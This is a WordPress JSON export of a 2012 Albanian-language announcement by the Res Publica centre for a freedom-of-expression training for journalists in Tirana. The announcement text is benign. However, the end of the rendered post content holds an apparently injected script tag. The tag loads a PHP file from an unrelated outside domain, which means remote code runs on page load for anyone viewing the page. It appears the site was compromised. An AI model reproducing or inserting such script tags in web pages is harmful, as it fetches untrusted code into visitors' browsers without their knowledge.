{"id":517,"date":"2012-10-02T15:50:56","date_gmt":"2012-10-02T13:50:56","guid":{"rendered":"http:\/\/www.respublica.org.al\/?p=517"},"modified":"2013-10-02T15:52:40","modified_gmt":"2013-10-02T13:52:40","slug":"liria-e-shprehjes-nga-teoria-ne-praktike-nje-trajnim-i-vlefshem-per-te-gjithe-profesionistet-e-medias","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=517","title":{"rendered":"\u201cLiria e shprehjes, nga teoria n\u00eb praktik\u00eb\u201d \u2013 Nje trajnim i vlefshem per te gjithe profesionistet e medias"},"content":{"rendered":"<header><a title=\"\" href=\"http:\/\/respublicalb.wordpress.com\/\" rel=\"home\">Home<\/a><\/header>\n<div>\n<p>Qendra Res Publica, \u00a0organizon trajnimin me titull\u00a0<strong>\u201cLiria e shprehjes, nga teoria n\u00eb praktik\u00eb\u201d<\/strong>, me fokusin kryesor trajnimin e gazetar\u00ebve dhe profesionist\u00ebve t\u00eb medias n\u00eb Shqip\u00ebri. Ky trajnim do t\u00eb zhvillohet\u00a0<strong>n\u00eb Tiran\u00eb, Hotel \u201cMondial\u201d, m\u00eb 13 Tetor 2012, ora 09.00.<\/strong><\/p>\n<p>N\u00eb kuad\u00ebr t\u00eb mbrojtjes s\u00eb lirive dhe t\u00eb drejtave t\u00eb njeriut, qendra Res Publica, sjell k\u00ebsaj rradhe praktik\u00ebn e saj me gjykatat shqiptare dhe praktik\u00ebn e Gjykat\u00ebs Europiane p\u00ebr t\u00eb Drejtat e Njeriut n\u00eb Strasburg, p\u00ebr t\u00eb b\u00ebr\u00eb m\u00eb t\u00eb preksh\u00ebm konceptet q\u00eb lidhen me lirin\u00eb e shprehjes.<\/p>\n<p>K\u00ebt\u00eb vit Res Publica ka marr\u00eb mb\u00ebshtetjen e National Endowment for Democracy, duke marr\u00eb p\u00ebrsip\u00ebr n\u00eb nj\u00eb faz\u00eb t\u00eb par\u00eb q\u00eb t\u00eb mbroj\u00eb n\u00eb terren gazetar\u00ebt dhe profesionist\u00ebt e medias n\u00eb proceset gjyq\u00ebsor\u00eb q\u00eb jan\u00eb ngritur kund\u00ebr tyre. Res Publica me eksperienc\u00ebn e vecant\u00eb n\u00eb fush\u00ebn e ndihm\u00ebs ligjore falas, p\u00ebrfshir\u00eb k\u00ebtu edhe p\u00ebrballjen n\u00eb gjykat\u00eb, tashm\u00eb ka formuar nj\u00eb bagazh t\u00eb mjaftuesh\u00ebm p\u00ebr t\u00eb nisur faz\u00ebn e dyt\u00eb t\u00eb k\u00ebtij projekti, q\u00eb \u00ebsht\u00eb trajnimi i gazetar\u00ebve dhe profesionist\u00ebve t\u00eb medias, duke i pajisur ata me koncepte mjaft praktike n\u00eb lidhje me detajet e zbatimit n\u00eb terren t\u00eb liris\u00eb s\u00eb shprehjes. Pas mbi 10 p\u00ebrfaq\u00ebsimesh t\u00eb suksesshme n\u00eb gjykat\u00eb, Res Publica synon t\u00eb trajnoj\u00eb dhjet\u00ebra gazetar\u00eb, q\u00eb ushtrojn\u00eb aktivitetin e tyre jo vet\u00ebm n\u00eb Tiran\u00eb, por edhe n\u00eb rrethe t\u00eb tjer\u00eb n\u00eb Shqip\u00ebri.<\/p>\n<p>Trajnimi do t\u00eb zhvillohet n\u00eb form\u00ebn e nj\u00eb serie leksionesh praktike, p\u00ebr t\u00eb mund\u00ebsuar n\u00eb m\u00ebnyr\u00eb teorike dhe praktike hapsir\u00ebn q\u00eb siguron e drejta p\u00ebr \u201cLirin\u00eb e shprehjes\u201d si aspekt thelb\u00ebsor i\u00a0 demokracis\u00eb dhe liris\u00eb n\u00eb t\u00ebr\u00ebsi.<\/p>\n<p>Q\u00ebllimi i k\u00ebtij trajnimi \u00ebsht\u00eb q\u00eb t\u00eb krijojm\u00eb nj\u00eb ide t\u00eb qart\u00eb tek gazetar\u00ebt dhe profesionist\u00ebt e medias rreth aspekteve kushtetuese, civile, penale t\u00eb liris\u00eb s\u00eb shprehjes, cilat jan\u00eb gj\u00ebrat q\u00eb nj\u00eb gazetar duhet t\u00eb dij\u00eb se \u00ebsht\u00eb i lir\u00eb t\u2019i b\u00ebj\u00eb, dhe cilat jan\u00eb ato veprime q\u00eb atij i ndalohen. T\u00eb gjitha k\u00ebto do t\u00eb shpjegohen nga specialist\u00ebt e Res Publicas deri n\u00eb detaje, pasi sot drejt\u00ebsia shqiptare ka hyr\u00eb n\u00eb nj\u00eb faz\u00eb t\u00eb re t\u00eb evolucionit t\u00eb jurisprudenc\u00ebs, ku gjyqtar\u00ebt, prokuror\u00ebt dhe avokat\u00ebt jan\u00eb m\u00eb shum\u00eb t\u00eb specializuar dhe standardet e gjykimit jan\u00eb rritur ndjesh\u00ebm, duke tejkaluar konceptet bazike dhe duke hyr\u00eb gjithnj\u00eb e m\u00eb shum\u00eb n\u00eb analiz\u00ebn shkencore t\u00eb cdo detaji ligjor.<\/p>\n<p>Trajnimi synon t\u00eb paralajm\u00ebroj\u00eb gazetar\u00ebt q\u00eb ka ardhur koha t\u00eb k\u00ebrkohet m\u00eb shum\u00eb prej tyre dhe se ata duhet t\u00eb jen\u00eb t\u00eb p\u00ebrgatitur t\u2019i p\u00ebrgjigjen evolucionit juridik q\u00eb p\u00ebson zbatimi i liris\u00eb s\u00eb shprehjes, aq m\u00eb shum\u00eb sot kur Shqip\u00ebria \u00ebsht\u00eb m\u00eb af\u00ebr se kurr\u00eb me integrimin europian.<\/p>\n<p>Kushdo q\u00eb gjen inter\u00e9s n\u00eb k\u00ebt\u00eb trajnim \u00ebsht\u00eb i lutur t\u00eb kontaktoj\u00eb tek:<\/p>\n<p>andi.kananaj@gmail.com<\/p>\n<\/div>\n<p><script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Home Qendra Res Publica, \u00a0organizon trajnimin me titull\u00a0\u201cLiria e shprehjes, nga teoria n\u00eb praktik\u00eb\u201d, me fokusin kryesor trajnimin e gazetar\u00ebve [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":518,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[6],"tags":[],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/517"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=517"}],"version-history":[{"count":1,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/517\/revisions"}],"predecessor-version":[{"id":519,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/517\/revisions\/519"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/518"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=517"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=517"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=517"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}